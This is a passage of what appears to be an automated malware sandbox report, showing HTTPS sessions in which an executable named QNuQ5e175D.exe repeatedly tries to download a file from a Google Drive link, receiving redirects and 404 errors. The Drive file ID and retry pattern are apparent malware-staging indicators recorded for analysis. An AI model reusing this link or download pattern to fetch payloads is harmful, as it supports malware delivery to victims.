                                                      X-GUploader-UploadID: AFIdbgSHHEp5YFj3HNU3hqZ1s2vIpBX5B2251aM3rioI1an75eyF2MfLVVdNZ0fT78X3ewRjcBJ7XPA
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:47 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-VSNeLRql5daDZf_dYffKag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:47 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 5a 64 75 48 4c 5f 57 79 76 75 66 67 43 33 57 5a 7a 70 49 74 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eZduHL_WyvufgC3WZzpItQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      42192.168.2.1150022172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:48 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:48 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:48 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-oOcdgzfFmDD0CAtTko-x3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      43192.168.2.1150023142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:49 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:50 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQILz_p_oTbhPoBahKB_UfXzbmKckVELPV23vZTVrk7MPddQrdnwJuqaQdUJr6Y5RJf
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:49 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-7WRZPqyN5fOr8bAbNk44qQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:50 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 39 55 4d 75 75 65 41 30 45 33 37 58 32 32 6c 6d 69 73 5f 32 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="09UMuueA0E37X22lmis_2g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      44192.168.2.1150024172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:50 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:51 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:51 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-mm4KoQmzii08qyH_yTVoww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      45192.168.2.1150025142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:51 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:52 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQyHgAjAxauHLOq6dbMWfXdCljVvh2pk3hRHPiw7ehWZVrDhZa8Pu6O8dyotXL67rK2
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:52 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-nE6Y7UtAuzb2nycRDjQYGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:52 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 75 35 6d 43 42 58 45 37 31 49 54 37 6f 62 75 42 6a 44 62 4a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4u5mCBXE71IT7obuBjDbJA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      46192.168.2.1150026172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:52 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:53 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:53 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-m9L1PiQiTHPV5K7-rcvfwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      47192.168.2.1150027142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:54 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:54 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQZpAqKQTmdyyG3Ej1Rs3p1D3qfZ3MW1VStHJTO1DTfIu42Ez8tzTFlGJ-wZbC4hQ78DGXeHg8
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:54 GMT
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-1ScqGiQUimKOlJ_kxupGWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:54 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 31 44 63 35 7a 4b 51 73 6c 67 6f 6f 50 7a 63 32 70 49 4f 45 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="T1Dc5zKQslgooPzc2pIOEQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      48192.168.2.1150028172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:55 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:55 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:55 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-a15GEvAqzmSeNr1bIS3YDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
